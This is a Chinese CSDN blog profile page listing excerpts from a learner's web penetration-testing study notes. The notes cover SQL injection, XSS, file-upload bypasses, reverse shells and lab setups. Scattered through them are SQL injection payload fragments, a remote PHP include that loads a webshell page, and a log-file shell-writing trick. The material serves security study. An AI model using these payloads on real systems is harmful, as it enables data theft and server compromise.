自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(36)
  • 收藏
  • 关注

原创 docker搭建kali及安装oneforall

docker cp /path/filename 容器id或名称:/path/filename。docker cp 容器id或名称:/path/filename /path/filename。经过百度后发现有好几种方案,一种是安装lrzsz,一种是直接使用docker的cp功能。Lrzsz 的rz命令可以把电脑文件导入容器,而sz命令可让文件从容器中导出。文件成功生成了,但csv文件在docker里查看起来有些麻烦。前期docker的安装这里就不用多说了,直接看后面的代码。导出文件到mac查看会方便的多。

2023-12-23 16:23:43 889

原创 百度大半天,一堆算了

灯塔就安装完成了,在浏览器中访问https://ip:5003 其中ip为Linux的ip 可通过ifconfig命令查询,登陆界面如下。github地址:https://github.com/TophantTechnology/ARL。默认账号密码为:admin/arlpass ,登陆后界面如下。我这边是使用docker安装,这个灯塔的说明文档里这么写的。

2023-12-22 21:40:24 541

原创 【无标题】

因为自己安装的,但是运行frida–version的时候出现错误,所以找到他的路径配置进去就行了。

2023-04-29 16:02:32 144

原创 sqli-labs靶场Page1【持续更新】

id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()–+ //在这块儿你会得到几个一些表,比如【Your Password:emails,referers,uagents,users】 可以查一下这些相关的资料。id=-1")union select 1,2,3–+ //位于2,3字段。前面几关弄完了会重新补充。

2023-04-29 16:00:20 166

原创 sqli-labs靶场Page1【持续更新】

id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()–+ //在这块儿你会得到几个一些表,比如【Your Password:emails,referers,uagents,users】 可以查一下这些相关的资料。id=-1")union select 1,2,3–+ //位于2,3字段。前面几关弄完了会重新补充。

2023-02-06 22:25:53 116

原创 第三十五天:XSS跨站&反射&存储&DOM&盲打&劫持

指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行处理或处理不严,则浏览器就会直接执行用户注入的脚本。窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份对网站执行操作;劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、发表日志、邮件等;XSS跨站-攻击项目&XSS平台&Beef-XSS。

2023-02-05 19:21:32 417

原创 第三十四天:文件上传&黑白盒审计&逻辑&中间件&外部引用

如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess。后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门。4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等。3、检测后缀:黑名单,白名单,MIME检测等。2、检测内容:文件头,完整性,二次渲染等。3、文件上传-实例CMS文件上传安全分析。2、文件上传-中间件解析&编辑器安全。1、检测层面:前端,后端等。

2023-02-05 16:32:11 167

原创 第三十三天:文件上传&中间件解析漏洞&编辑器安全

Apache HTTP Server(简称Apache)是Apache软件基金会的一个开放源码的网页服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一。先判断中间件,是否有解析漏洞,字典扫描拿到上传点,或者会员中心,有可能存在文件上传的地方,而后测试绕过/验证,根据实际情况判断是白名单、黑名单还是内容其他的绕过,绕过/验证和中间件的解析漏洞也不行的话就看看CMS是否存在漏洞,然后看看编辑器漏洞有无以及其他漏洞如CVE漏洞。各个平台解析漏洞讲解。

2023-02-05 16:31:14 306

原创 第三十二天:文件上传&二次渲染&.htaccess&变异免杀

include’http://794750069/'> //这里的http://794750069/是一个包含一句话木马的网页。原文链接:https://blog.csdn.net/hesysd/article/details/127979999。如果要图片后缀解析脚本代码,一般会利用包含漏洞或解析漏洞,还有.user.ini&.htaccess。1.直接全部都删除,这种就只能通过条件竞争(即通过快速访问文件,让文件的进程被占用,导致无法删除)4、绕过技巧:多后缀解析,截断,中间件特性,条件竞争等。

2023-02-05 16:30:17 240

原创 第三十一天:无解

后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门。在前端对代码进行了验证,这时候就需要修改前端验证即可。152-JS验证+MIME。CTFshow 靶场实战。加入了MIME的验证。

2023-02-05 16:24:18 82

原创 第三十天:WEB攻防-通用漏洞&SQL注入&CTF&二次&堆叠&DNS带外

SQL注入中的二次注入常见于 注册 新建 等功能点,当我们注册一个新的账号时,需要我们设置我们的 邮箱,用户名,密码。但是当我们成功注册后,登录只需要邮箱与密码即可完成登录,且进入后台用户中心后,我们也可以发现我们的用户名会被显示出来,这就是SQL注入的常见出现流程我们在注册新的账号时,如果使用了 ‘’ “” 等符号 ,会被转义。所以我们常使用的sql注入payload 都会失去效果,但是当该payload被存入数据库在被引出使用的时候是原样输出,不会被过滤转义。这就是二次注入的原理了。

2023-02-04 17:52:13 380

原创 第二十九天:WEB攻防-通用漏洞&SQL注入&增删改查&盲注&延时&布尔&报错

就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。解决:常规的联合查询注入不行的情况。

2023-02-03 13:51:46 277

原创 第二十八天:WEB攻防-通用漏洞&SQL注入&HTTP头XFF&COOKIE&POST请求

提交方式注入 - get post cookie http头等出现不同提交方式的原因:数据大小,类型,功能SQL注入的原理是在于 源码与数据库交互的时候未对用户输入的数据进行过滤,所以我们常规的可见的注入点往往就是在url上 例如 :http://127.0.0.1/index.php?id=1 的id参数处存在sql注入。常见payload http://127.0.0.1/index.php?但是我们往往还有其他的注入点容易被忽略不同接收方式产生的注入。

2023-02-02 23:38:55 355

原创 第二十七天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等

1.数据库注入 - access mysql mssql oracle mongodb postgresql等。

2023-02-01 22:57:04 173

原创 第二十六天:WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等

爆其他列名:and 1=2 union select ‘1’,(select column_name from all_tab_columns where rownum=1 and table_name=‘sns_users’ and column_name not in (‘USER_NAME’)) from dual。-p “user-agent” --user-agent “sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)” #指定user-agent注入。

2023-02-01 15:39:02 237

原创 练习:SQL注入——PostgreSQL

不同于mysql数据库的union select 1,2,3,4,该i数据库的使用null来替代,union select null,null,null,null,在中间输入之后同样使用and1=2来进行报错即使and 1=2 union select null,null,null,null。and 1=2 union select ‘null’,null,null,null 错误。and 1=2 union select null,null,null,‘null’ 错误。依次序使其测出显位。

2023-02-01 14:14:37 1773 2

原创 第二十五天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL

分为盘符绝对路径和网址绝对路径盘符绝对路径:顾名思义如图:网址绝对路径:网址的路径,如下图-路径获取:phpinfo,报错,字典等-无法写入:secure_file_priv突破 注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过set global slow_query_log_file=‘shell路径’;select '

2023-01-31 17:17:24 606

原创 第二十四天:WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS偏移

脚本代码在实现代码与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),将定义的SQL语句进行执行查询数据时。其中的SQL语句能通过参数传递自定义值来实现控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感数据,如管理员帐号密码)。这一个过程就可以叫做SQL注入漏洞。

2023-01-23 19:39:44 547

原创 第二十三天:WEB攻防-WEB攻防-Python考点&CTF与CMS-SSTI模版注入&PYC反编译

pyc文件是py文件编译后生成的字节码文件(byte code)。pyc文件经过python解释器最终会生成机器码运行。所以pyc文件是可以跨平台部署的,类似Java的.class文件。一般py文件改变后,都会重新生成pyc文件。当然,生成的pyc文件也是可以通过网上一些在线平台反编译出来从而获得源码的反编译平台:1.https://tool.lu/pyc/ 2.http://tools.bugscaner.com/decompyle/但是实战环境下,一般也获取不到pyc文件,所以就没有更多的细节了。

2023-01-18 14:19:13 207

原创 第二十二天:WEB攻防-JS项目&Node.JS框架安全&识别审计&验证绕过

JavaScript语言特性在于,其他语言比如php,java语言需要解析方才能清楚看到代码本身,JavaScript语言则可以通过在其网站本身代码检查便可查看,等同于白盒测试在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞。

2023-01-16 15:15:14 295

原创 第二十一天:WEB攻防-JavaWeb项目&JWT身份攻击&组件安全&访问控制

搭建使用教程请查看以下这篇文章其中需要注意的是,在用bf抓包的过程之中,火狐会对其中127.0.0.1这个还有localhost这两个限制,只需要将其修改完成后方可搭建完成后进入各个关卡如图然后将其该文件解压打开idea,然后将其全部拖入idea中当然有些文件打不开,可以先增加为库,便可打开对文件一一查看,寻找。

2023-01-15 16:48:59 298

原创 第二十天:WEB攻防-PHP特性&缺陷对比函数&CTF考点&CMS审计实例

= 表示属于弱类型判断 不判断类型可以通过MD5的值来进行绕过而对于===可通过数组来进行绕过我写的,不知哪儿出错,但意思我明白//name[]=1&password[]=2 // === 无法判断数组 所以name[] 和password[] 都是null。

2023-01-11 17:05:33 239 1

原创 第十九天:WEB攻防-.NET项目&DLL反编译&未授权访问&配置调试报错

net编码无法直接查看,他是属于一个框架,所以需要反编译下面打开一个.net源码文件打开admin文件,在其中随便选择一个文件在这里我们选择了一个Company.aspx文件注意如果选择其他 随意文件,也许会很难找到,但一般都存在,细心一下就可以找到【本人理解】然后打开之后会出现一段代码在下面一般会出现其中的文件位置打开文件中bin目录可以通过上面知道一个这样的文件拖入其中,反编译然后仔细查找,便可找到其中的文件。

2023-01-09 17:20:44 385

原创 第十八天:WEB攻防-ASP安全&MDB下载植入&IIS短文件名&写权限&解析

找到之后为输入他的路径http://192.168.106.132/database/powereasy2006.mdb便可下载他的数据库文件。然后我们可以进入http://192.168.106.132/admin/Admin_Login.asp,也就是后台管理,便可操作他的数据库。当数据库文件是 mdb格式文件时,可以直接访问数据库文件,然后本地就会下载该数据库,使用数据库工具打开即可获得所有数据库信息。在后台文件中有一个这个数据,即为他的数据库文件。-asp程序的数据库下载植入。

2023-01-06 17:33:58 692

原创 html了解科普【牛马自学】

img src=“xss/2.jpg” alt="聂风"border=“6”> border表示给图片复制一个边框,了解便可以了,真正的边框是通过css实现的。 width设置图片的宽度,height设置图片的高度。alt表示图片加载不出来的时候替换文本。

2023-01-05 20:13:15 62

原创 关于Navicat Premium 15无法创建表,也就是1045错误的解决方案

当我们新人第一次使用Navicat Premium 15无法创建表,也就是1045报错的时候。也就是MySQL----mysql_secure_installation 安全配置向导。我们直接执行mysql_secure_installation命令。网上有很多的方案,但是都很复杂。然后设置你的密码,很简单处理。【不懂得可以搜索一下】

2023-01-04 17:46:55 1417

原创 第十一天:信息打点--TP框架&路由访问&安全写法&历史漏洞

天冷加上没网,很多东西下载什么的完全无法操作。TP框架&路由访问&安全写法&历史漏洞。3、基于TP框架实例源码安全性评估。1、基于TP框架入门安装搭建使用。2、基于TP框架内置安全写法评估。后面慢慢的将这些操作全部补充回来。

2022-12-14 17:17:07 129

原创 第十天:信息打点--个人博客项目&登录验证&Cookie&Session&验证码安全

这样,当用户在应用程序的 Web 页之间跳转时,存储在 Session 对象中的变量将不会丢失,⑤单个Cookie保存的数据不能超过4K,很多浏览器都限制一个站点最多保存20个Cookie,Session是没有大小限制和服务器的内存大小有关。②session 能够存储任意的 java 对象,cookie 只能存储 String 类型的对象。【cookie在过程中可以被修改,而后者在第一次使用后就会被清除,下一次重新生成,因此无法修改】PHP验证的代码看不到,你能看见的是代码执行后的结果,只能黑盒测试。

2022-12-14 17:00:32 155

原创 第九天:信息打点--个人博客项目&输入输出类&留言板&访问IP&UA头&来源

​ 存储型(或 HTML 注入型/持久型)XSS 攻击最常发生在由社区内容驱动的网站或 Web 邮件网站,不需要特制的链接来执行。这些地区可能是博客评论,用户评论,留言板,聊天室,HTML 电子邮件,wikis,和其他的许多地方。反射型:黑客发送带有xss恶意脚本的链接,用户点击恶意链接,访问目标服务器,网站将xss同正常页面返回到用户浏览器,用户浏览器解析网页中的恶意代码,发起恶意请求到恶意服务器,​ 存储型XSS漏洞的成因与反射型的根源类似,不同的是恶意代码会被保存在服务器中,

2022-12-09 18:10:30 328

原创 第八天:信息打点--个人博客项目&文章功能显示&数据库操作&数据接受&个人博客项目&文件操作类&编辑器&上传下载删除读写

编辑器引用顾名思义,引用他人已经编写好的代码,插件,达到上传文件的作用,如果出现问题,那么本身责任不在于代码,验证测试则仍在编辑器本身,和其内所含有的代码的好坏并无多大的影响。//fread(读取的文件,读取到哪个位置)函数代表读取打开的文件,filesize代表返回文件的最大字节,额【框架也类似于编辑器,是一种程序员写好的,封装过的程序,Java中的框架,php中的框架等】这种问题引发的,也是从代码验证。【小迪的意思是,上传一个图片,得到一个图片地址,尝试包含图片,图片里面有后门代码】

2022-12-09 17:04:27 464

原创 第七天;信息打点-资产泄漏&CMS识别&Git监控&SVN&DS_Store&备份

下载好对应的文件后,找到逍遥模拟器的文件所在位置目录(可以鼠标右键单击图标,选择打开文件所在位置),将刚刚下载的对应版本的xposed文件放到该目录中。首先根据自己的模拟器版本,在自己的电脑本机上下载对应版本号的Xposed.exe文件,我使用的是7.1(64bit)带WAF的CDN:用户访问域名–>CDN节点(WAF)–>真实服务器IP–>访问目标主机。通过一定的信息收集,如备案号,服务厂商等信息,缩小真实IP的范围,再配合扫描工具,依旧是进行全球ping【子域名是主域名的下一级域名,

2022-12-02 22:37:19 825

原创 第五、第六天:基础入门-资产架构&端口&应用&CDN&WAF&站库分离&负载均衡||Web架构篇&域名&语言&中间件&数据库&系统&源码获取

是一种安全的加密方式,涉及到密码,偏移量,数据块,填充,在加密时候涉及到4种随机性。服务器架设多个站点安全:架设第三方插件接口安全【管理方可能为了更多的功能,使用了多个插件,测试可通过对其插件寻查测试,言简意赅就是负担太多,就容易出错】如果剩下的字符不足3个字节,则用0填充,输出字符使用‘=’,2:碰撞性:原始数据与其MD5值并不是一一对应的,有可能多个原始数据计算出来的MD5值是一样的,这就是碰撞。3:不可逆:也就是说如果告诉你一个MD5值,你是无法通过它还原出它的原始数据的,这不是你的技术不够牛,

2022-11-28 23:20:51 1233 2

原创 第四天:基础入门-30余种加密编码进制&Web&数据库&系统&代码&参数值

是一种安全的加密方式,涉及到密码,偏移量,数据块,填充,在加密时候涉及到4种随机性。Base64编码要求把3个8位字节(38=24)转化为4个6位的字节(46=24),之后在6位的前面补两个0,形成8位一个字节的形式。如果剩下的字符不足3个字节,则用0填充,输出字符使用‘=’,2:碰撞性:原始数据与其MD5值并不是一一对应的,有可能多个原始数据计算出来的MD5值是一样的,这就是碰撞。3:不可逆:也就是说如果告诉你一个MD5值,你是无法通过它还原出它的原始数据的,这不是你的技术不够牛,

2022-11-27 21:21:05 1017

原创 第三天:基础入门-抓包&封包&协议&APP&小程序&PC应用&WEB应用

例如:游戏中放个技能产生的数据包不止一个,抓包就是零散的一个,可能是点击q时产生一个数据包,但是封包可以对放技能产生的所有数据包进行抓取。不再是单纯的域名,IP地址,会让测试无从下手,这时候可以使用抓包封包工具进行抓包,获得目标Web端信息,Burp Suite,Fiddler等常见工具为Web端抓包工具,支持Http/Https协议。抓包简单的是对单个数据包进行抓取,封包为了对某一时断或某一动作的所有数据包进行抓取。-应用对象:小程序,APP,桌面应用等无法直接获取到资产信息的测试对象。

2022-11-25 23:30:52 1298 1

原创 第二天:基础入门-Web应用&架构搭建&漏洞&HTTP数据包&代理服务器

通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制。在这种模式 下,shell不与你进行交互,如果用反向 Shell,那就是在 A 上先开启一个监听端口,然后让 B 去连接 A 的这个端口,容器:容器是中间件的一种,处在操作系统和应用软件之间,给处于其中的应用程序组件提供一个环境,我们都知道 Shell 的概念吧,简单来说,Shell 就是实现用户命令的接口,交互式模式就是在终端上执行,shell等待你的输入,并且立即执行你提交的命令。

2022-11-23 21:45:53 606

原创 第一天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙绕过

反弹:反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发器请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。Payload:中文"有效载荷",指成功exploit之后,真正在目标系统执行的代码或指令(漏洞利用成功后的形式,或者说通道)。

2022-11-23 00:00:44 612 1

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除